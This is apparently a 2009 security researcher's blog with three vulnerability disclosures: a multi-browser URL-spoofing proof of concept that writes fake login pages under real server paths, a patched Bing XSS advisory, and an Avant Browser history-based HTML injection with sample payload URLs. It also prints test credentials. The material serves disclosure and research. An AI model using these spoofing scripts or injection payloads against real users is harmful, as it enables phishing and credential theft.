Multiple Browsers Fake url folder & file Same origin Spoof

Saturday, August 15, 2009
#########################################
Multiple Browsers Fake url folder & file Same origin Spoof
Original Article:http://lostmon.blogspot.com/
2009/08/multiple-browsers-fake-url-folder-file.html
##########################################

##############
Abstract
##############

One user open his browser and try to navigate to
http://www.host.com/admin/admin.php this url is in
the remote server and if the user has privileges ,
can access to file admin.php

If the file admin.php isn`t in the server
the user get a 404 http error by server.

If the user try to browse http://www.host.com/admin/
and this path isn´t in the server , the user get again a 404
http error.

If the user press refresh button the page reloads the content
and if the user press ctrl+f5 it refresh all content from
the page.

Some times those http errors like 404 ,403 etc are managed
by a third part app, a toolbar, or with a predefined
dynamic content build inside the browser.

#######################
Explanation
#######################

Multiple browsers have a flaw in this request response
that allow a attacker to spoof the url or spoof the content
from a inexistent file or path or spoof the url and content
from a trust file or Path.

Also a attacker can "trap" the broser in spoofed web and
wen the user press f5 or refresh button , the page show
the spoofed content or if the user press ctrl+f5 the page
show the spoofed content , Only in Opera Browser this last
issue does not work.


##################
Testing
##################

I test it with windows xp home sp3 fully patched.
for testing let´s to write some script like:

####################
SOURCE CODE OF POC
####################
online PoC =>http://cmspatch.200u.com/urlspoof.html
<html>
<head></head><body>
<title>Multiple Browsers Fake url folder & file Same Origin Spoof</title>
<center>
<h1>Multiple Browsers Fake url folder & file Same origin Spoof By Lostmon</h1>
</center>
<p>
<a href='modules/profile/admin/admin.php' target='_blank'><h2>real path</h3></a>
<a href='javascript:spoofolder()'><h2>spoof a url folder !!</h2></a> Non existent path
<a href='javascript:spoofile()'><h2>spoof a url file !!</h2></a>  this file exist in the server.
<a href='javascript:spoofauth()'><h2>spoof a url with auth basic !!</h2></a><br>only exist Protected and have password.
<p></p>
<strong>pass for the cms. user Dismark pass souaktendio.</strong><br>
<strong>pass for Portected folder. user terrapro pass mayoristas.</strong>
<p>

<script>
function spoofolder()
{
a = window.open('modules/login')
a.document.write('<H1>FAKE LOGIN PAGE<\h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
function spoofile()
{
a = window.open('modules/system/admin.php')
a.document.write('<H1>FAKE LOGIN PAGE<\h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
function spoofauth()
{
a = window.open('protected/admin/admin.php')
a.document.write('<H1>FAKE LOGIN PAGE<\h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
</script>
</body></html>

######## END SOURCE #####

Save it as c:/test/urlspoof.html for example.
I use one alert for show the real window.location.
for testing i have open the file using file:/// protocol handler
and for remote test i have upload the file to a server.
to a apache in windows 2003 and in a apache on linux red hat.

server windows:
Windows Server 2003
Apache/2.2.8 Win32
PHP/5.2.6
Server at ***********.com

server linux:

Apache/2.2.11 (Unix) mod_ssl/2.2.11
OpenSSL/0.9.8e-fips-rhel5
mod_auth_passthrough/2.1
FrontPage/5.0.2.2635 Server
at ***********.com

in all test cases the server send the correct
http response.

########################
Localy afected Browsers
########################

For this test i use file protocol handler and
only test file spoof and path spoof.

1 - Firefox 3.5.1 and 3.5.2
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in al cases firefox show the spoofed
url and content.(firefox 3.5.2 seems not vulnerble)

2 - Lunascape 5.1.3 and 5.1.4 (swiched to Trident engine)
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in al cases Lunascape show the
spoofed url and content spoofed.

3 - Orca browser 1.2 build 2 seems not vulnerable ,but wen browse the file
the browsers add to url wyciwyg://4/ and executes the fake content.

4 - Flock 2.5.1
open urlspoof via file c:/test/urlspoof.html and clik
in any spoof function in all cases Flock show the
spoofed url and content spoofed.

5 - K-Meleon 1.5.3
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in all cases K-Meleon show the
spoofed url and content spoofed.

6 - SeaMonkey 1.1.17
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in all cases SeaMonkey show the
spoofed url and content spoofed.

7 - Avant browser 11.7 build 36
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in all cases Avant show the
spoofed url and content spoofed.


Google chrome 2.0.172.39 (Build oficial )
write in all tree cases in about:blank.

Internet Explorer 8 seems not vulnerable via file: protocol


########################
Remote afected Browsers
########################

For this test up the file to a server
and browse to file via http://host.com/urlspoof.html

1 - Internet explorer 7 and 8
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.

2 - Avant browser 11.7 build 35 and build 36
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.

3 - Lunascape 5.1.3 and 5.1.4 (swiched to Trident engine)
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.

4 - Maxthon Browser 2.5.3.80 UNICODE
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.

Google chrome write in all cases in about:blank

#################
Trap issue
#################

All of afected browsers , wen you are in the Fake url
wen you try to reload or refresh the location , via ctrl+f5
or f5 or similar the browser not show a 404 http error,
it continue showing the fake page location.
it is very interesting , because a attacker can create a "ghost" file
in a "ghost" path.
in the case of the fake File, we can spoof any web page on the server
with the fake page and wen the user try to reload it or refresh
the browser shows the fake page not the real page location.

##################€nd ##################

Thnx to cLimbo for Spread the Word
Thnx to estrella to be my ligth.
Thnx to all Lostmon Groups Team.

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Bing.com WebmasterAuthenticationInformationPage.aspx XSS

Thursday, August 13, 2009
###########################################
Bing.com WebmasterAuthenticationInformationPage.aspx XSS
vendor url:http://ww.bing.com
advisore:http://lostmon.blogspot.com/2009/08/
bingcom-webmasterauthenticationinformat.html
vendor notify: yes vendor confirmed:yes
###########################################

Bing search engine contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does not
validate properly 'authTag' variable upon submission to the
'WebmasterAuthenticationInformationPage.aspx' script.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server,leading to a loss of integrity.


them a attacker can compose a malformed link in the variable
from WebmasterAuthenticationInformationPage.aspx and Look the
result code , it is write in two boxes and in the file
'LiveSearchSiteAuth.xml'

A remote user can compose a malformed link in the variable
from WebmasterXMLAuthDownloadPage.aspx ,wen download file
LiveSearchSiteAuth.xml this file have the malicious code.

#########
solution:
##########

Vendor patch

#############
timeline:
#############

discovered: 18-jun-2009
vendor notified: 07-08-2009
vendor response: 07-08-2009
vendor patch response: 13-08-2009
disclosure: 13-08-2009


################ End #####################

Thnx to Microsoft Security Response Center (MSRC)
http://blogs.technet.com/msrc/
thnx to estrella to be my ligth
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente...

Internet explorer pwned Avant Browser

Monday, August 03, 2009
###########################################
Internet explorer pwned Avant Browser via
history Persistent XSS vulnerabilities
vendor url: http://www.avantbrowser.com/
Advisore: http://lostmon.blogspot.com/2009/08/
internet-explorer-pwned-avant-browser.html
vendor notify: NO exploit available: yes
############################################

#############
description
#############

Avant Browser´s user-friendly interface brings a new level
of clarity and efficiency to your browsing experience,and
frequent upgrades have steadily improved its reliability.
Avant Browser is freeware That's right. 100% Free!.

A recently vulnerability in Avant browser discovered by me
Can be exploit via history on ie8

Related Vuln =>

http://lostmon.blogspot.com/2009/07/
avant-browser-browserhome-persistent.html

###############
version tested
###############

Internet Explorer 8 (in xp home)

Avant Browser 11.7 build 35

#########
solution:
##########

Update to version 11.7 build 36
it is reported and tested that isn´t
vulnerable.

#############
timeline:
#############

discovered: 23-07-2009
disclosure: 03-08-2009

##################
testing
##################


http://lostmon.blogspot.com/2009/07/
avant-browser-browserhome-persistent.html

See this related vulnerability in avant browser.Now go
to exploit it across explorer , we know that the column
history is afected by a script insercion in browser:home
dinamicaly content.

If a user open explorer and try to navigate to a malicious
site like :
http://usuarios.lycos.es/reyfuss/id.php?id="><h1>Test html injection</h1>

For example if we Browse this url with avant browser =>
http://usuarios.lycos.es/reyfuss/id.php?id="><iframe src='http://www.google.com'></iframe>

The iframe does not executed correctly in history, but ,
close avant, browse the url with IE8 and them , open
avant browser ...the iframe now is executed correctly :D

Those url are saved in the explorer history, here is the
vulnerability, because Avant browser use IE8 web history
to show his own history in the browser:home history column,
them open avant browser and the html is executed in the history
colum and in most visited sites.

I don´t know if with the anty-xss filter in IE8 can protect
from a script attack but at this moment we can think that this
issue can have a html injection condition and a attacker can insert
a iframe...And this is other vector to attack Avant browser.

################ End #####################

thnx to estrella to be my ligth
thnx to Brink he is investigate with me.
thnx to all who day after day support me !!!
atentamente:
--
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente...

Latest OSVDB Vulnerabilities

 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...